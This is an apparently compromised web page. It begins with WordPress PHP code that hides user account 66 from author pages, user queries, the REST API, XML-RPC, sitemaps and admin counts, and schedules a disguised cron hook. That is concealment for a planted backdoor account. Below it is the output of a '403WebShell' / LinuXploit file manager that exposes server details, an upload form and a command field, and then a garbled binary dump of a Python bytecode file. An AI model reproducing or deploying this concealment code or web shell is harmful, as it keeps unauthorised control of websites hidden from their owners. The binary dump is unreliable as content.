add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/self/root/lib/python3.12/asyncio/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/lib/python3.12/asyncio/__pycache__/subprocess.cpython-312.pyc
�

:5j9��2�dZddlZddlmZddlmZddlmZddlmZddlmZejZ	ejZ
ejZGd	�d
ejej�ZGd�d�Zdddej fd
�Zdddej d�d�Zy))�create_subprocess_exec�create_subprocess_shell�N�)�events)�	protocols)�streams)�tasks)�loggerc�L��eZdZdZ�fd�Zd�Zd�Zd�Zd�Zd�Z	d�Z
d	�Z�xZS)
�SubprocessStreamProtocolz0Like StreamReaderProtocol, but for a subprocess.c����t�|�|��||_dx|_x|_|_d|_d|_g|_|jj�|_y)N)�loopF)�super�__init__�_limit�stdin�stdout�stderr�
_transport�_process_exited�	_pipe_fds�_loop�
create_future�
_stdin_closed)�self�limitr�	__class__s   ��)/usr/lib/python3.12/asyncio/subprocess.pyrz!SubprocessStreamProtocol.__init__sZ���
���d��#����15�5��
�5�T�[�4�;����$������!�Z�Z�5�5�7���c�l�|jjg}|j�|jd|j���|j�|jd|j���|j
�|jd|j
���dj
dj|��S)Nzstdin=zstdout=zstderr=z<{}>� )r�__name__r�appendrr�format�join)r�infos  r�__repr__z!SubprocessStreamProtocol.__repr__s������'�'�(���:�:�!��K�K�&�����/�0��;�;�"��K�K�'�$�+�+��1�2��;�;�"��K�K�'�$�+�+��1�2��}�}�S�X�X�d�^�,�,rc�n�||_|jd�}|�ftj|j|j
��|_|jj|�|jjd�|jd�}|�ftj|j|j
��|_
|jj|�|jjd�|jd�}|�)tj||d|j
��|_yy)Nr�rr�r)�protocol�readerr)
r�get_pipe_transportr�StreamReaderrrr�
set_transportrr#r�StreamWriterr)r�	transport�stdout_transport�stderr_transport�stdin_transports     r�connection_madez(SubprocessStreamProtocol.connection_made(s���#���$�7�7��:���'�!�.�.�T�[�[�48�J�J�@�D�K��K�K�%�%�&6�7��N�N�!�!�!�$�$�7�7��:���'�!�.�.�T�[�[�48�J�J�@�D�K��K�K�%�%�&6�7��N�N�!�!�!�$�#�6�6�q�9���&� �-�-�o�7;�59�37�:�:�?�D�J�'rc�x�|dk(r
|j}n|dk(r
|j}nd}|�|j|�yy�Nrr*)rr�	feed_data)r�fd�datar,s    r�pipe_data_receivedz+SubprocessStreamProtocol.pipe_data_received@s@��
��7��[�[�F�
�1�W��[�[�F��F������T�"�rc��|dk(rz|j}|�|j�|j|�|�|jj	d�y|jj|�d|j_y|dk(r
|j}n|dk(r
|j}nd}|�$|�|j�n|j|�||jvr|jj|�|j�y)NrFrr*)
r�close�connection_lostr�
set_result�
set_exception�_log_tracebackrr�feed_eofr�remove�_maybe_close_transport)rr9�exc�piper,s     r�pipe_connection_lostz-SubprocessStreamProtocol.pipe_connection_lostJs���
��7��:�:�D����
�
��� � ��%��{��"�"�-�-�d�3�
�	�"�"�0�0��5�5:��"�"�1��
��7��[�[�F�
�1�W��[�[�F��F����{����!��$�$�S�)�
������N�N�!�!�"�%��#�#�%rc�2�d|_|j�y)NT)rrD�rs r�process_exitedz'SubprocessStreamProtocol.process_exitedhs��#����#�#�%rc��t|j�dk(r/|jr"|jj	�d|_yyy)Nr)�lenrrrr=rIs rrDz/SubprocessStreamProtocol._maybe_close_transportls:���t�~�~��!�#��(<�(<��O�O�!�!�#�"�D�O�)=�#rc�8�||jur|jSy�N)rr)r�streams  r�_get_close_waiterz*SubprocessStreamProtocol._get_close_waiterqs���T�Z�Z���%�%�%� r)
r"�
__module__�__qualname__�__doc__rr'r5r;rGrJrDrP�
__classcell__)rs@rrrs.���:�8�-�?�0#�&�<&�#�
&rrc�Z�eZdZd�Zd�Zed��Zd�Zd�Zd�Z	d�Z
d�Zd	�Zd
�Z
d
d�Zy)�Processc��||_||_||_|j|_|j|_|j
|_|j
�|_yrN)r�	_protocolrrrr�get_pid�pid)rr1r+rs    rrzProcess.__init__wsH��#���!�����
��^�^��
��o�o����o�o����$�$�&��rc�P�d|jj�d|j�d�S)N�<r!�>)rr"rZrIs rr'zProcess.__repr__�s&���4�>�>�*�*�+�1�T�X�X�J�a�8�8rc�6�|jj�SrN)r�get_returncoderIs r�
returncodezProcess.returncode�s�����-�-�/�/rc��RK�|jj��d{���S7��w)z?Wait until the process exit and return the process return code.N)r�_waitrIs r�waitzProcess.wait�s�����_�_�*�*�,�,�,�,�s�'�%�'c�:�|jj|�yrN)r�send_signal)r�signals  rrezProcess.send_signal�s�����#�#�F�+rc�8�|jj�yrN)r�	terminaterIs rrhzProcess.terminate�s�����!�!�#rc�8�|jj�yrN)r�killrIs rrjzProcess.kill�s�������rc���K�|jj�}	|�=|jj|�|r t	j
d|t
|��|jj��d{���|rt	j
d|�|jj�y7�7#ttf$r#}|rt	j
d||�Yd}~�bd}~wwxYw�w)Nz%%r communicate: feed stdin (%s bytes)z%r communicate: stdin got %rz%r communicate: close stdin)r�	get_debugr�writer
�debugrL�drain�BrokenPipeError�ConnectionResetErrorr=)r�inputrnrEs    r�_feed_stdinzProcess._feed_stdin�s������
�
�$�$�&��	H�� ��
�
� � ��'���L�L�?��s�5�z�S��*�*�"�"�$�$�$���L�L�6��=��
�
����
%���!5�6�	H�����;�T�3�G���		H�sA�C)�AB4�:B2�;B4�?3C)�2B4�4C&�C!�C)�!C&�&C)c��K�y�wrN�rIs r�_noopz
Process._noop�s	�����s�c���K�|jj|�}|dk(r
|j}n|dk(sJ�|j}|jj�r |dk(rdnd}t
jd||�|j��d{���}|jj�r |dk(rdnd}t
jd||�|j�|S7�P�w)Nr*rrrz%r communicate: read %sz%r communicate: close %s)
rr-rrrrlr
rn�readr=)rr9r1rO�name�outputs      r�_read_streamzProcess._read_stream�s������O�O�6�6�r�:�	�
��7��[�[�F���7�N�7��[�[�F��:�:���!�!�Q�w�8�H�D��L�L�2�D�$�?��{�{�}�$���:�:���!�!�Q�w�8�H�D��L�L�3�T�4�@������
�%�s�BC#�C!�AC#Nc��K�|j�|j|�}n|j�}|j�|j	d�}n|j�}|j
�|j	d�}n|j�}t
j|||��d{���\}}}|j��d{���||fS7�$7�
�wr7)	rrsrvrr{rr	�gatherrc)rrrrrrs     r�communicatezProcess.communicate�s������:�:�!��$�$�U�+�E��J�J�L�E��;�;�"��&�&�q�)�F��Z�Z�\�F��;�;�"��&�&�q�)�F��Z�Z�\�F�&+�l�l�5�&�&�&I� I���v�v��i�i�k�������!J���s$�B%C�'C�(C�C�	C�CrN)r"rQrRrr'�propertyr`rcrerhrjrsrvr{r~rurrrVrVvsH��'�9��0��0�-�,�$���(��" rrVc����	K�tj��	��	fd�}�	j||f|||d�|���d{���\}}t||�	�S7��w)Nc���t����S�Nr)�rr)s��r�<lambda>z)create_subprocess_shell.<locals>.<lambda>�����7�e�=A� C�r�rrr)r�get_running_loop�subprocess_shellrV)
�cmdrrrr�kwds�protocol_factoryr1r+rs
    `    @rrr�sm������"�"�$�D�C�� 5�� 5� 5���!����!��!���I�x��9�h��-�-�	�s�6A�A�A)rrrrc����
K�tj��
��
fd�}�
j||g|��|||d�|���d{���\}}	t||	�
�S7��w)Nc���t����Sr�r�r)s��rr�z(create_subprocess_exec.<locals>.<lambda>�r�rr�)rr��subprocess_execrV)�programrrrr�argsr�r�r1r+rs    `     @rrr�sy������"�"�$�D�C�� 4�� 4� 4���!��!��F��	!��	!���I�x�
�9�h��-�-��s�9A�A�A)�__all__�
subprocess�rrrr	�logr
�PIPE�STDOUT�DEVNULL�FlowControlMixin�SubprocessProtocolrrV�_DEFAULT_LIMITrrrurr�<module>r�s���
=������������	�	�	��
�
�
��b&�w�7�7�(�;�;�b&�JU �U �p.2�$�t�(/�(>�(>�	.�8<�D�(,�G�4J�4J�.r

Youez - 2016 - github.com/yon3zu
LinuXploit